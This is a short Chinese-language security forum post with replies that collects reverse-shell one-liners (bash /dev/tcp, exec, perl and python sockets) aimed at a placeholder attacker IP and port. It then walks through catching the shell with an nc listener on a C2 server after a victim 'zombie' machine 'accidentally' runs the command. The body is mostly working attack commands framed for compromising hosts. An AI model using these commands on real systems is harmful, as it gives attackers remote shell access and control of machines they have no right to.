首页
社区
课程
招聘
反弹shell暨内网上线命令
发表于: 2017-12-11 12:48 3267

反弹shell暨内网上线命令

2017-12-11 12:48
3267

看到一篇有意思的文章

如何DIY一个简单的反弹Shell脚本

自古评论出大神

  1. 利用exec弹

    $ exec 5<> /dev/tcp/your-fuxking-public-ip/your-fuxking-port 0>&1
    $ cat <&5 | while read line; do $line 2>&5 >&5; done
    
  2. 利用bash弹,在目标机器上执行

    bash -i >& /dev/tcp/your-fuxking-public-ip/your-fuxking-port 0>&1
    
  3. 利用perl弹

    perl -e 'use Socket;$i="your-fuxking-public-ip";$p=your-fuxking-port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    
  4. 利用python弹

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your-fuxking-public-ip",your-fuxking-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    

尝试一下

挑个最简单的尝试一下吧,模型是最简单的肉鸡上线模型。

  1. 首先在c2c服务器上开6666端口,等待连接:

    # nc -l 6666
    
  2. 肉鸡 “不小心” 执行了我们的命令:

    106.*.*.*那个打码的c2c服务器地址,6666是端口号。

  3. 上线!


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 203
活跃值: (53)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
2
你看都没人回你,一定是你长的不行,还是我支持你一下吧。
2017-12-12 16:54
0
雪    币: 3907
活跃值: (5822)
能力值: ( LV12,RANK:200 )
在线值:
发帖
回帖
粉丝
3
静河流 你看都没人回你,一定是你长的不行,还是我支持你一下吧。[em_19]
难道web板块人气太低不是主要的原因么...我就是自己记个笔记防止以后忘记了而已
2017-12-16 20:22
0
雪    币: 203
活跃值: (53)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
4
roysue 难道web板块人气太低不是主要的原因么...我就是自己记个笔记防止以后忘记了而已[em_12]
瞎说什么大实话。
2017-12-16 23:52
0
游客
登录 | 注册 方可回帖
返回
//